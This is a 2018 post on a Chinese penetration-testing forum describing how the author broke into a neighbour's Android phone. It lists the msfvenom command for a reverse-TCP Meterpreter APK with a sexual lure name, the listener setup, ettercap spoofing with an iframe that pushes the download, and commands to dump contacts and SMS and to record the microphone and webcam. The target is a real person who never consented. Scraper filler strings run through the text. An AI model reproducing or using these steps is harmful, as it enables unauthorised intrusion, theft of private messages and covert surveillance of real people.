找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1304|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 o$ ]# a6 v) B8 t" }7 \4 b 五、msf+ettercap入侵邻居安卓手机 2 ~) a! @- L% W9 E

) k' W" x' C! L# ^; ^ p

1 s ^1 b" B2 Y) a9 F+ l& ^) q 首先启动msf $ O- f, D. v" k) C

4 O+ e7 H7 t0 e& Y; v

1 V$ I6 {4 H) _5 v5 i 先用kali生成一个安卓木马,如下命令: {; e3 t# G6 [. h- k; E3 h0 C/ [

4 F9 r" V% ]5 j8 R9 n5 ]. O9 A

2 A2 Y u$ j1 s. m" N O$ X4 K$ t Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 1 g& g1 ?& v7 r7 u5 n' c9 q

1 P* c9 u# {3 }# }

7 E) ~3 l" L9 I$ e 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 / D% `- z& f) j5 J; ]7 W$ ?

9 ~+ x- |9 j5 \3 z" Q

8 P! B' q9 l- U7 I9 D 然后进入msf / I/ V1 d* j% n$ Z F+ _0 h5 y

+ V- w& s! Y$ U2 V# f2 q, e: q

N, e' R; g# {5 d q/ _7 E: Q use exploit/multi/handler y* w- X. z6 Z% R; v' ~

; v1 k( d+ s% D( z+ Z% g& O* V: Y

+ w! E1 C* X; E. E3 i4 K# g set payload android/meterpreter/reverse_tcp 5 E2 I3 V0 E9 W( l/ \( G

& F7 v: G n* t& n* T) B% i

# Z/ |4 m2 |# m& F/ [* f. C; w3 i set LHOST 192.168.0.109 //ipkailiip ( `8 \# r8 `, S( U# `2 b

+ [/ o( |% O; ]2 o+ ~/ k {

' X! G% ?3 d2 _4 J9 A' _2 Q set LPORT 44444 //端口一定要与前面生成的木马的端口一致 + h5 i! c3 P% O# H2 k) ]+ W2 \

' q4 A2 E6 T2 S5 b: Y4 ]

* O% _" [9 h5 N& q5 g u+ E# k# ^ Exploit 6 z4 c) B* C5 V4 R! v

( _# T% o% N8 q9 d$ z N! q

+ ?* x* s# C0 R# K% ?* J9 o   ' A$ d( f+ |: p H2 }0 V5 w9 }4 e2 B* K

3 `; c( }- Q' q; K% x$ f4 h( A

6 G B. S2 h6 [1 D2 T U7 J 下面我们开启ettercap -G 4 Q0 z y, j# Y% g; p2 o0 ~$ A

% [5 O* V& R0 m

: u9 h m4 l$ J. I2 | 我物理IP 1 ^* W Z1 \+ a2 J1 E8 D9 K

4 a% ^+ |+ Q8 {

: K- h+ N6 o( R   $ u- I& f+ q7 g" U* d6 O; \3 W6 H

& s+ r; O8 D- @& f# K" c

8 F7 s3 q r4 P3 O3 A 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ) e9 T3 a; H" j

. i9 X% y: I g& R, ?* d* U

' _. S1 A5 c i' z; d& I 下面我们来设置一下 ' g) L$ h4 y1 K

k6 M; g* f+ S* D" i& w3 e- W" U

, n% }* @/ q0 v   2 O% A5 s7 H/ k! N( F

$ M6 N0 H7 w1 T y E# n

1 c% `. ]! b% s# z4 j* e 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 0 K: r$ S, R, g( z k

7 A. n4 e {0 {: f( b4 H6 Q! ^

$ a- {- ^& c y6 s# T) D" W% v7 R   4 T: I$ {" x2 [$ v* E8 {

0 U, G8 h( ~0 i; G1 i$ T1 I

8 C3 p" Y, ^4 P* m- A- W& O8 I   ) b$ n+ ?3 i8 z0 _3 P/ s( s

: d# T# p/ H, e* J! \

0 y+ x; t2 g# r9 J   1 m2 z: B" u, v

6 w! @" e+ A% j; \

# S4 O" H: u2 V$ s! Q, C   & d% m: u" t0 ^5 W3 ?

8 C6 ~' t, P) {3 [. W. w

5 M7 \4 E0 i! X: y" A8 h5 B( l   7 t% T; ~4 J7 x2 }( T

9 O; g: O' V) c- W3 v: j. ~' }# s

# S3 y/ F: U% {8 E6 J   & [! q( l# ^8 x* a7 A

, F4 z& m* w$ T8 {: m

/ j! D4 e' m2 Q8 l   - @- i9 W# |& @9 r, v" w$ u, x

H4 g3 R5 ~4 o) M2 ] `! I2 g

% }. T8 W$ a& W. g- |   # [$ E; b7 i( D3 _2 \% D9 X

& b) X8 ~, `0 k) Z, d' Z, w& R

0 q h. i: x0 Q6 Q% h" g, F. w   # P- @7 J0 \5 N& m; d" e

) R; z4 y8 W$ b

# k- f% g4 r! n% a3 s   6 T' P, o+ o f: ~. a

2 B5 X& S( b& A, K3 i

8 E/ q' U, y. O: K" Z   3 ^5 ~$ C# T& R" q

3 D4 Y7 J9 v9 i' C

3 ?" ~, P7 Y; |& l ]& G# Y# K   0 s0 N, M" Q/ H6 S

9 ?. r7 M6 y1 v2 w& k

& n) W! l% x% _$ S4 g( k$ k   - @1 N; }. R! s5 D$ G

: F- G ^* c [! P

q# E' @% i: t4 [ 下面我们开始攻击 9 Q: Q8 ^# [0 w

5 C# @4 H. Q/ T4 f

1 @# F4 q# O1 K   : `3 h- Y6 g; l5 l3 g

/ C) M2 H/ E, N% d; r( I

, B5 X1 y1 ^! T) c0 Q   % ?9 f+ W8 ^- Y# d1 z

6 o& V6 T3 P4 D' b# O6 a w

" B$ w; d$ z% s! p   $ i- g; `8 R8 W% l* ? ~

7 T8 y7 G3 w# M3 y! f( e8 O8 b

5 K# J `6 `/ T& c   9 \( O. \( _! ^% C6 ^8 |/ I

+ t0 p8 h C' j! e. o8 o6 w: ]' A

0 X) l5 p& V# V   6 F5 Z( {2 W1 {2 o5 ^" {! H! v

7 q$ J; b0 _1 q" H( k( r; X* M

+ D" J" `" F# S9 R7 C 大概过了5分钟多,发现反弹成功了 ) o* G6 {' {7 B6 S5 v4 t2 h O

2 S5 k, w4 r: `( B& S

, }! G+ j2 [: J8 G   ( Z7 c& {3 K K

4 Q; Z) ?7 z* v% ]. Q/ m

, v) f5 y8 A; A B+ p" K! o A. c8 v   6 F& I! N0 _1 T

' z7 ^& Z6 j' I" R- w

' w/ v- e5 O% G! w   ; v! J! _" V( H

& s, s* x6 W j/ u! B$ t# M

4 ]' U8 H" b4 I: J. Q   ; h8 Q# m5 p" F2 R( m3 {' _

* i& j m9 [9 N& G

) i! W7 ]/ X4 h& |   / ~$ N" u+ h2 B2 \

8 y5 l2 ^5 |' |3 I: W; m

. C/ D; ?8 E( ]9 s$ L( I; o4 v   ' I9 ~- y7 M. j

3 v$ C% r4 N G4 s$ y: \# K1 W

+ S0 G; r6 J7 }: L/ \   4 a9 W3 I$ B a2 p. r% M+ r. `

- P/ O9 d$ c( ]8 j# h# n

4 w7 ^# i6 d4 [. b S |9 u8 k 执行命令 6 g+ U9 E! k( O2 \, k" B& l

3 {# n. J' e) c

! J$ p6 `' k U/ }; U6 S9 n+ e" ^5 z   ' c1 r2 {2 H' K# [/ A! c; U

H t2 Q* r6 s5 s/ P, z! w

& V# f* d+ ?: ?+ z7 a5 Z dump_contacts    --》这个是导出电话 $ \2 ?$ S, E2 H6 X+ |

2 x: P9 ~3 Z% c/ U8 W9 L

* T. L+ s! }) h n Y X dump_sms --》这个是导出信息 {7 R6 C2 g9 p4 F2 n: _

& U1 e* G! D. y8 S6 O) `; `/ L

6 Z6 c- Q! N3 q+ `3 A9 v, F record_mic     Record audio from the default microphone for X seconds , l& Z; k" u9 E6 m4 w; X* v

, Z' p0 u, W" d2 M

/ ~( t* H N/ L     webcam_chat    Start a video chat ! k9 a5 X0 v: N7 `

1 o0 G' c( m( A; j/ ?, [3 B1 F

, d+ x% g, w# e- U' A     webcam_list    List webcams $ a d7 c2 J* ]3 u

3 ^0 k# P \* s& h* L! \3 L) X

& j! ^, z" r5 t3 w; [# Q     webcam_snap    Take a snapshot from the specified webcam ) ~/ i" h4 T7 ~. q9 R% o9 m7 r

7 }: a! a' z( y) A% k/ N9 z

! e4 _5 N' v: Z8 w) d, A8 C webcam_stream  lay a video stream from the specified webcam 2 h5 A: o- a! w

: P2 o' O8 X! s( B

9 u0 G+ `7 f$ x1 Q4 @; w5 f   + [8 d, O- s, Q& p- r3 i3 V

x/ l0 Q J! S# q7 q! Z

5 D" {" D- T$ N' A* o   ! J% C9 T6 G0 ?. J

& @% f" u8 N( m

l! Z8 m3 D% K8 P+ i4 M 我们打开看一下电话薄, . V$ t1 O" r5 U$ k- C

@# I! w/ o! c; y2 E

; g8 h, o6 ~8 ]2 V( d- s1 }- |   : E+ a ^+ O; F% ~

0 R% X, n6 R" Y' W* L. ^

; g$ j. m0 c5 d( y) z, [   0 _+ u! `; e9 z {6 {+ b. f0 |

$ q) G% Q+ J$ ~6 Q, V1 C+ K2 I

5 r! g5 V0 r n' d8 U   & {, N0 N4 E3 p, U1 G! l: i! R

4 m, R0 Q1 ]& q% _* Q5 y6 o& P

( k% r% i U# _2 R) t; @- g   " J6 I' Z; Z1 k0 N$ B6 T+ X* p/ ~

( F- f3 l# X5 h: a9 e4 D# B

; m6 U; i6 B" I: s3 A9 M8 {   ; T* a: }: n7 c0 R. W& K X

4 s" c, F* {5 E0 H6 e. N

. G$ n+ q) }( w5 L1 n W   ) D1 w( F5 s- h! K/ b

) y& i% _. O w, a4 |% `

6 A9 i" ~- @0 b/ K6 ]0 B9 r! H: e8 s 我们同时欺骗成DroidJack木马,使用方法如图: # w& P4 a: U4 i! T4 s& v. X

3 |- _5 @4 Q/ l& N2 U

8 r# Y1 Y! F$ v( r# H9 D   % G8 n* ^. V# C% u

( Q7 D$ b% O g8 @0 ^

; ?9 ~2 u; B& I- @, c7 N5 Z   - n# O7 n5 Y5 `- W, o

7 f( ^. `- m9 ?! Y/ ?

" K5 V: h6 D: Y( N0 t   + o2 u% ], z5 k4 A7 x, f

' H$ m3 j! X6 }: l. K9 d

+ {) b K" ^: x# a; ^ d 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 4 m6 ~* l# c4 _3 p. Z0 e

# @- [! J* k7 G0 r2 ?6 u# I

6 o" i" O" w$ {. u2 c, R   " f* ~& O! b3 Y

3 @# J) ]) j) W9 H1 @

. F7 P# L' r: |' l/ @! i$ ?$ a   0 y J( Q0 ]4 B( t4 W u2 \

0 J) U* [! a6 S

4 Z n5 C. h" N   - @( q L* O+ X6 O, n

9 Y% F h3 p: a9 O/ M7 E, |

7 [, v# D0 m0 u" N7 J. [) q # ^# k( h3 B: r% A8 O

* X' H- W4 ^8 G: f8 {; B3 k

* @3 e% C) v, F
, R! g$ t# s. x& e6 C8 U u- E

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表